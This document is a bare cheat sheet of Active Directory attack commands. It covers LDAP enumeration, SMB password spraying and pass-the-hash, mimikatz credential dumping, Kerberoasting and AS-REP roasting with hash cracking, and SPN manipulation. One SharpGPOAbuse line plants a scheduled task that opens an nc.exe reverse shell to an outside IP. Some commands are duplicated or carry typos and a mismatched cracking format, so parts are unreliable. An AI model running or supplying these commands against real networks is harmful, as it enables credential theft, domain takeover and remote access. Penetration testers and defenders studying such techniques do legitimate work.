======
ldapdomaindump ldap://<domain> -u 'DOMAIN\user' -p 'password'
nmap -p 389 --script-args 'ldap.username="cn=myUser,cn=users,dc=myDomain,dc=local",ldap.password=P@ssw0rd,ldap.qfilter=users,ldap.attrip=sAMAccountName' myDomain.local
cat domain_users.grep | awk '{print $1}' > users.txt
cat domain_computers.grep | awk '{print $3}' | grep -v dNS | xargs dig a @192.168.105.10 | grep kortana.local | egrep -v "^;" | awk '{print $5"-"$1}' | cut -d '.' -f1-4 | tr [[:lower:]] [[:upper:]]
for dir in $(cat domain_computers.grep | awk '{print $3}' | grep -v dNS | xargs dig a @192.168.105.10 | grep kortana.local | egrep -v "^;" | awk '{print $5"-"$1}' | cut -d '.' -f1-4 | tr [[:lower:]] [[:upper:]]); do mkdir ~/$dir; done
crackmapexec smb -u /path/to/users.txt -p /path/to/passwords.txt 192.168.0.0/24
crackmapexec smb 192.168.0.0/24 -u Administrator --local-auth -H <NTLM:hash>
xfreerdp /u:DOMAIN\user /p:<pass> /v:<ip>
Rubeus.exe asktgt /user:<user> /rc4:<NTLM hash> /createnetonly:cmd.exe /show /domain:<domain> /dc:<dc-ip>
mimikatz.exe "privilege::debug" "log .\logs\Result.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" exit
SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author "DOMAIN\user" --Command "cmd.exe" --Arguments "/c C:\Temp\nc.exe -v 192.168.99.21 443 -e cmd" --GPOName Name-of-GPO
crackmapexec smb 192.168.0.0/24 -u Administrator --local-auth -H <NTLM:hash>
xfreerdp /u:DOMAIN\user /p:<pass> /v:<ip>
Rubeus.exe asktgt /user:<user> /rc4:<NTLM hash> /createnetonly:cmd.exe /show /domain:<domain> /dc:<dc-ip>
mimikatz.exe "privilege::debug" "log .\logs\Result.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" exit
Get-NetUser -SPN
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
python GetUserSPNs.py domain.local/domainUser:abc123 -outputfile outfile.txt
Invoke-Kerberoast -Domain plum.local
john kerberoast.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5asrep
Get-DomainUser -PreauthNotRequired -Verbose
Get-ADUser -Filter {DoesNoteRequirePreAuth -eq $True} -Properties DoesNoteRequirePreAuth
Get-ASREPHash -UserName myUser -Verbose
Invoke-ASREPRoast -Verbose
.\Rubeus.exe asreproast /outfile:outfile.txt
python GetNPUsers.py domain.local/ -usersfile users.txt -outputfile outfile.txt
Set-DomainObject myUSer -Set @{serviceprincipalname='ops/whatever1'}
Set-ADUser -Identiny <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}